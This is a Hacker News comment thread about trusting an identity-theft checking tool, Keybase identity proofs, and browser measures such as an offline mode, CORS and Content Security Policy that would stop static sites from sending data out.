Hacker News new | past | comments | ask | show | jobs | submit login

Kind of the guy to offer. I found it interesting thinking about the issue of trust, here. He's claimed to be a certain individual, linked to social media with a long history as a proof of identity, but still had to admit that you're basically hitting up a site to solve identity theft using a tool that might help cause you more privacy problems should the individual not be who he claims to be[0].

I hope the folks at Keybase notice this. It's a perfect use case. He's specifically pointed to his long social media history as a proof that should increase trust. Keybase would let him use their proofs feature to validate that he (well, his account) controls his twitter, that domain and web site[1], and his HN account. I can't think of a better way to reduce the "you can't really trust that I am who I say I am" problem he's struggling with.

Of course, this could be gamed just like every other method of authenticating identity, but it's a nice additional option.

[0] I'm not saying he's not or assuming he's malicious; I tend to err on the side of assuming the best in people.

[1] You can submit proofs for both.




What we lack, in my opinion, is a form of access control for static websites, such that they are disallowed from making any outgoing requests. The browser is in control of the site code; it should be possible to guarantee that no outgoing requests can take place. As far as I can see, it shouldn’t be difficult, but it’s possible I’m missing something — I assume the difficult part is just reaching agreement.

Perhaps it would be possible to permit outgoing requests where the URL is statically embedded in the HTML (such that the URL cannot depend on form data), thus allowing fetching e.g. remote CSS/JS resources.


Who would be the party who ensures the site is actually static and doesn't send data from backend?


The browser handles requests to the backend, and would thus be the one in charge of not allowing requests in case the site enables this proposed “offline mode”. So all the browser would allow would be the initial, user-initiated fetch of the static site, whereas subsequent requests — initiated by the site itself — would be disallowed.


Isn't that basically CORS?


CORS stops you from contacting an external service that doesn't opt in. It doesn't solve the problem of having private data in the browser that you don't want it to send out, since it could contact an evil site that opts in to receiving messages from other web pages.

To implement something like the suggestion would require two phases - one where the page was loading/updating its cache from the remote service, but was unable to look at locally stored data, and another phase, where the user is able to log in and allow access to locally stored data. Once transition has been made to the second phase network access would not be allowed. This sounds pretty involved.


Turn off Javascript


Something like uMatrix can be used by the client, and Content Security Policy combined with Subresource Integrity can be used by the publisher.




Consider applying for YC's W25 batch! Applications are open till Nov 12.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: